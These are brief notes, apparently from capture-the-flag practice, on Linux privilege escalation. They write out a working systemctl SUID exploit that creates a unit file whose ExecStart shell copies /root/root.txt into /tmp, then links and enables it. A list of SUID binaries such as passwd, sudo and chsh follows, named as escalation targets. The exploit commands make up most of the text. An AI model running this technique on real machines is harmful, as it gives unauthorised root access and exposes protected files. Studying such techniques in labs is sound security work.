Privilege Escalation Techniques

eop=$(mktemp).service # create a temp file with a random unique name and store the name in a eop variable
echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop # write the config for the service into the file. This unit file will be used by the systemctl to run the process specified in the ExecStart variable. 
# ❗️ Do not copy this code in whole, line by line without the > sign, or else you will not get it work
# ❗️ I have added touch $eop but it's not required (it was in my case, cause I had an error)

/bin/systemctl link $eop # This command in Linux creates a symbolic link for the service file specified in the "$eop" environment variable, in the "/etc/systemd/system/" directory, using the systemctl utility. The link created allows the service to be managed with systemctl commands.

/bin/systemctl enable --now $eop # This command in Linux enables and starts the service specified in the "$eop" environment variable, using the systemctl utility. The "enable" option makes the service to start at boot time, while the "--now" option starts the service immediately after the command is executed.

/usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.